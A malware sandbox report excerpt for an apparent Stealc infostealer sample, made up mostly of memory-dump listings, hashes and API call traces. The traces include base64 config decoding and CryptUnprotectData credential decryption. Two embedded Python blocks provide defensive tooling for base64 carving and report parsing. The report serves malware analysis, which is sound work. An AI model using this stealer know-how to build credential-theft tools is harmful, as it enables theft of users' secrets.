                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: :E?$cLW$d:o}$mq~k
                            • API String ID: 0-831522934
                            • Opcode ID: 6c93bb3a5a1f3ae395fcd56a91a77540124ecb520365657affd62949c45b9cd2
                            • Instruction ID: 62cb7e348bfb89f1118e6167064c0c5a7ccf07d3ee4020d22bdc6ea9a57416d8
                            • Opcode Fuzzy Hash: 6c93bb3a5a1f3ae395fcd56a91a77540124ecb520365657affd62949c45b9cd2
                            • Instruction Fuzzy Hash: A0B2D7F360C2009FD304AE2DEC8567ABBE6EF94720F16893DE6C5C7744EA3558058657
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: !p$337{$V~oO$@MF
                            • API String ID: 0-1752303649
                            • Opcode ID: e10fbb72952fcbbb33270d18222917699140ad83a2c0484e10a6d9c90f493ae0
                            • Instruction ID: b7cadfff65acb705a4d55d5e25bb27b24383a856bdf4e0d3378c7feae0150543
                            • Opcode Fuzzy Hash: e10fbb72952fcbbb33270d18222917699140ad83a2c0484e10a6d9c90f493ae0
                            • Instruction Fuzzy Hash: F5B2B4F3A082109FE304AE2DEC8577AB7E9EF94720F16893DE6C5C3744EA3558058696
                            APIs
                            • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 008EEBC6
                            • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 008EEBCE
                            • lstrcat.KERNEL32(0090CFF4,0090CFF4), ref: 008EEC77
                            • lstrcat.KERNEL32(0090CFF4,0090CFF4), ref: 008EEC99
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$BinaryCryptStringlstrlen
                            • String ID:
                            • API String ID: 189259977-0
                            • Opcode ID: 935bb8088324440399bee9ec808b16687beabb6c8ae9ed49a14c0d7eeb1d94b8
                            • Instruction ID: fe1154334b77ff6c0bdf70d972f6c8f2e4b76b50b56c5296686d8daac5a8201c
                            • Opcode Fuzzy Hash: 935bb8088324440399bee9ec808b16687beabb6c8ae9ed49a14c0d7eeb1d94b8
                            • Instruction Fuzzy Hash: 6331C976A14119ABD7109B58EC45BEF7B79EF84705F408165FA08E3280DBB05A058BA2
                            APIs
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009042DD
                            • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009042EC
                            • RtlAllocateHeap.NTDLL(00000000), ref: 009042F3
                            • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00904323
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptHeapString$AllocateProcess
                            • String ID:
                            • API String ID: 3825993179-0
                            • Opcode ID: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                            • Instruction ID: 5e1ed58ab2e8ed47b9dfdfc738c09d32d1a39e6247a6b511dcf080df602e0861
                            • Opcode Fuzzy Hash: b129bbc59590e4d42b1f31a3ebc1ec8d4388273607cd057aa459b34f8d8d6a8c
                            • Instruction Fuzzy Hash: 12012CB1600209BFDB10DFA5EC99BAABBADEF89311F108159FE09C7250DA70D950CB60
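The two crypt32 conversions in the entries above are the Windows base64 decoder and encoder: CryptStringToBinaryA at 008EEBCE is called with dwFlags 00000001 (CRYPT_STRING_BASE64), and CryptBinaryToStringA at 009042DD and 00904323 with dwFlags 40000001 (CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, i.e. one line with no CR/LF inserted). The Python below is an added example, not code from the sample, from Stealc or from Joe Sandbox: it models what those two flag values do to the bytes, then carves base64 runs that decode to printable text out of a memory dump such as the .sdmp files listed above. The 64-column wrap of the non-NOCRLF form is assumed from certutil -encode output, and the dump blob and URL in it are constructed for the example.

```python
"""Model of the crypt32 base64 flags from the report's API lists, plus a carver
for base64 strings in a memory dump. Added example; not the sample's own code."""
import base64
import re

# Real wincrypt.h constants. 0x40000001 in the report = BASE64 | NOCRLF.
CRYPT_STRING_BASE64 = 0x00000001
CRYPT_STRING_NOCRLF = 0x40000000
WRAP = 64  # assumed: Windows wraps base64 at 64 columns when NOCRLF is not set


def crypt_binary_to_string(data: bytes, flags: int) -> str:
    """Python model of CryptBinaryToStringA for the flag values seen in the report.
    Returns the text the Windows call would write into the caller's buffer."""
    if (flags & 0xFF) != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is modelled")
    encoded = base64.b64encode(data).decode("ascii")
    if flags & CRYPT_STRING_NOCRLF:
        return encoded                                  # 0x40000001: single line
    lines = [encoded[i:i + WRAP] for i in range(0, len(encoded), WRAP)]
    return "".join(line + "\r\n" for line in lines)     # 0x1: CRLF after each line


def crypt_string_to_binary(text: str, flags: int) -> bytes:
    """Python model of CryptStringToBinaryA(CRYPT_STRING_BASE64): whitespace and
    CRLF between groups are skipped, any other non-alphabet byte is an error."""
    if flags != CRYPT_STRING_BASE64:
        raise ValueError("only CRYPT_STRING_BASE64 is modelled")
    compact = re.sub(r"\s+", "", text)
    return base64.b64decode(compact, validate=True)


def required_size(text: str) -> int:
    """The 'size query' first call: CryptStringToBinaryA with pbBinary=NULL only
    reports how many bytes the caller must allocate before the second call."""
    return len(crypt_string_to_binary(text, CRYPT_STRING_BASE64))


# Runs of the base64 alphabet long enough to be worth decoding.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{16,}={0,2}")


def carve_base64(blob: bytes) -> list:
    """Scan a dump for base64 runs that decode to printable ASCII.
    Returns (offset, encoded, decoded) tuples; binary-looking decodes are dropped."""
    hits = []
    for m in B64_RUN.finditer(blob):
        run = m.group()
        run = run[: len(run) - len(run) % 4]    # drop an incomplete trailing group
        try:
            decoded = base64.b64decode(run, validate=True)
        except ValueError:
            continue
        if decoded and all(0x20 <= b < 0x7F for b in decoded):
            hits.append((m.start(), run.decode("ascii"), decoded.decode("ascii")))
    return hits


# Constructed stand-in for a dump: a PE magic, one base64 URL (RFC 2606 name,
# not from the sample), an import name and a run of 'A's that decodes to zeros.
SAMPLE_URL = "http://example.invalid/api.php"
SAMPLE_DUMP = (b"MZ\x90\x00" + b"\x00" * 8
               + base64.b64encode(SAMPLE_URL.encode()) + b"\x00" * 4
               + b"RtlAllocateHeap\x00" + b"A" * 24 + b"\x00" * 4)

if __name__ == "__main__":
    for offset, enc, dec in carve_base64(SAMPLE_DUMP):
        print(f"{offset:#010x} {enc} -> {dec!r}")
```

The printable-only filter is what keeps the carver useful on a real .sdmp: long alphanumeric runs that are really code or zeroed pages decode to bytes outside 0x20-0x7E and are discarded, while configuration strings, which is what a stealer feeds through CryptStringToBinaryA, survive.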
                            APIs
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B3B
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 008E9B4A
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B61
                            • LocalFree.KERNEL32 ref: 008E9B70
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: BinaryCryptLocalString$AllocFree
                            • String ID:
                            • API String ID: 4291131564-0
                            • Opcode ID: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                            • Instruction ID: a4f46e34e000186c86688e35bccca372971c904d9d5ef4f6e4e4bf12e386de38
                            • Opcode Fuzzy Hash: 231fa092b15c90731990db574c29c511ac2e793a7e6a6bc79ca48988a0423a6f
                            • Instruction Fuzzy Hash: A0F01DB03403627BF7305F65AC59F967BA8EF49B60F200114FE45EA2D0DBB09840CAA4
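Every entry above names its dumps in the same shape, proc.run.id.base.protect.x.type.seq.sdmp, and the values that occur in the protection field (00000004, 00000008, 00000040, 00000080) are exactly the winnt.h PAGE_READWRITE, PAGE_WRITECOPY, PAGE_EXECUTE_READWRITE and PAGE_EXECUTE_WRITECOPY constants, while 01000000 in the type field matches MEM_IMAGE. The script below is an added example, not Joe Sandbox tooling; the field layout and those two interpretations are assumptions drawn from the names themselves, and the report excerpt it parses is copied from the entries on this page. It maps each ref: address to the dump that holds it and flags the size-query / allocate / convert idiom seen at 009042DD-00904323 and 008E9B3B-008E9B61.

```python
"""Parser for the report's memory-dump names and API lists. Added example, not
Joe Sandbox tooling; field meanings are assumptions based on the names."""
import re
from dataclasses import dataclass

# Real winnt.h values; the assumption is that the report stores them verbatim.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x08: "PAGE_WRITECOPY", 0x20: "PAGE_EXECUTE_READ",
                   0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: <proc>.<run>.<dumpid>.<base>.<protect>.<field6>.<type>.<seq>.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>[0-9A-F]{8})\.(?P<run>[0-9A-F]{8})\.(?P<dumpid>\d+)\."
    r"(?P<base>[0-9A-F]{16})\.(?P<protect>[0-9A-F]{8})\.(?P<field6>[0-9A-F]{8})\."
    r"(?P<mtype>[0-9A-F]{8})\.(?P<seq>[0-9A-F]{8})\.sdmp", re.IGNORECASE)
# API lines: "• Api.DLL(arg,arg), ref: ADDR"; LocalFree appears without parentheses.
API_RE = re.compile(r"•\s*(?P<api>\w+)\.(?P<dll>\w+)(?:\((?P<args>[^)]*)\))?,?\s*"
                    r"ref:\s*(?P<ref>[0-9A-F]{8})", re.IGNORECASE)
ALLOCATORS = {"LocalAlloc", "GlobalAlloc", "HeapAlloc", "RtlAllocateHeap",
              "VirtualAlloc", "malloc"}


@dataclass(frozen=True)
class Region:
    name: str
    base: int
    protect: int
    mtype: int

    @property
    def protect_name(self) -> str:
        return PAGE_PROTECTION.get(self.protect, hex(self.protect))

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mtype, hex(self.mtype))

    @property
    def writable_executable(self) -> bool:
        return self.protect in (0x40, 0x80)   # pages the sample can both write and run


def parse_sdmp(name: str):
    m = SDMP_RE.search(name)
    if not m:
        return None
    return Region(m.group(0), int(m["base"], 16), int(m["protect"], 16),
                  int(m["mtype"], 16))


def parse_report(text: str):
    """Returns (regions sorted by base, API-call blocks). A block is the list of
    (api, dll, ref) tuples under one 'APIs' heading, i.e. one function."""
    regions, blocks = {}, []
    for line in text.splitlines():
        if line.strip() == "APIs":
            blocks.append([])
            continue
        region = parse_sdmp(line)
        if region:
            regions[region.name] = region
            continue
        m = API_RE.search(line)
        if m and blocks:
            blocks[-1].append((m["api"], m["dll"].upper(), int(m["ref"], 16)))
    return sorted(regions.values(), key=lambda r: r.base), blocks


def region_for(addr: int, regions):
    """Dump whose base is the highest one not above addr (regions are sorted)."""
    best = None
    for r in regions:
        if r.base > addr:
            break
        best = r
    return best


def find_size_query_pairs(blocks):
    """Flag the two-call idiom: the same crypt32 converter called twice in one
    function with an allocator in between (the first call sizes the buffer)."""
    pairs = []
    for block in blocks:
        apis = [api for api, _, _ in block]
        for i, (api, _, ref) in enumerate(block):
            if not api.startswith("Crypt"):
                continue
            for j in range(i + 1, len(block)):
                if block[j][0] == api and ALLOCATORS & set(apis[i + 1:j]):
                    pairs.append((api, ref, block[j][2]))
                    break
    return pairs


# Excerpt copied from this report's entries (two functions, four dump names).
REPORT_EXCERPT = """
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009042DD
• GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009042EC
• RtlAllocateHeap.NTDLL(00000000), ref: 009042F3
• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00904323
Memory Dump Source
• Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
APIs
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B3B
• LocalAlloc.KERNEL32(00000040,00000000), ref: 008E9B4A
• CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 008E9B61
• LocalFree.KERNEL32 ref: 008E9B70
"""

if __name__ == "__main__":
    regions, blocks = parse_report(REPORT_EXCERPT)
    for r in regions:
        print(f"{r.base:#010x} {r.protect_name:24} {r.type_name}")
    for api, first, second in find_size_query_pairs(blocks):
        r = region_for(first, regions)
        print(f"{api}: size query at {first:#x}, convert at {second:#x}, in {r.name}")
```

Two things fall out on this page's data: every ref: address in the API lists lands in the 008E1000 dump, which is PAGE_EXECUTE_READWRITE and MEM_IMAGE, consistent with the "changes PE section rights" and "entry point lies outside standard sections" signatures, and the 008E0000 page holding the PE header is plain PAGE_READWRITE, so the dump at 008E0000 is the one to rebuild a PE from.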
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: 0Aie${WW}$$6
                            • API String ID: 0-3618849632
                            • Opcode ID: 8d71c265db3313a7c955e1d79bed51707f8a5f1af715d3786263bb1956b81fec
                            • Instruction ID: 8f852e7c9d19b8ea4b736492e720fd1b8a14a6a50edd4b995aa91d143caf6b6b
                            • Opcode Fuzzy Hash: 8d71c265db3313a7c955e1d79bed51707f8a5f1af715d3786263bb1956b81fec
                            • Instruction Fuzzy Hash: 94B2F7F3A0C2049FE304AF29EC8567AFBE9EF94720F16493DE6C5C3744EA3558018696
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: ONyo$a)?$~'{{
                            • API String ID: 0-3897584696
                            • Opcode ID: 4f61ee8c31d84c5ed6cdc42bc462eb2778eca3e79167c2084585704900d6c97a
                            • Instruction ID: 47d3e0a2ddc4343ca523d302890f1364aeabde2e17f358553d964a7160ac65c5
                            • Opcode Fuzzy Hash: 4f61ee8c31d84c5ed6cdc42bc462eb2778eca3e79167c2084585704900d6c97a
                            • Instruction Fuzzy Hash: C1B2E3F360C200AFE704AE2DEC8567AFBE9EF94720F16492DE6C5C7744E63598018697
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: =2[u$aphj$c{?
                            • API String ID: 0-2987279715
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 00904075
                            • lstrcpy.KERNEL32(00000000,012FED98), ref: 0090409F
                            • GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,008E134E,?,0000001A), ref: 009040A9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$SystemTime
                            • String ID:
                            • API String ID: 684065273-0
                            APIs
                            • CoCreateInstance.COMBASE(0090B118,00000000,00000001,0090B108,?), ref: 008FCCF6
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 008FCD36
                            • lstrcpyn.KERNEL32(?,?,00000104), ref: 008FCDB9
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                            • String ID:
                            • API String ID: 1940255200-0
                            APIs
                            • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 008E9B9F
                            • LocalAlloc.KERNEL32(00000040,?), ref: 008E9BB3
                            • LocalFree.KERNEL32(?), ref: 008E9BD7
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
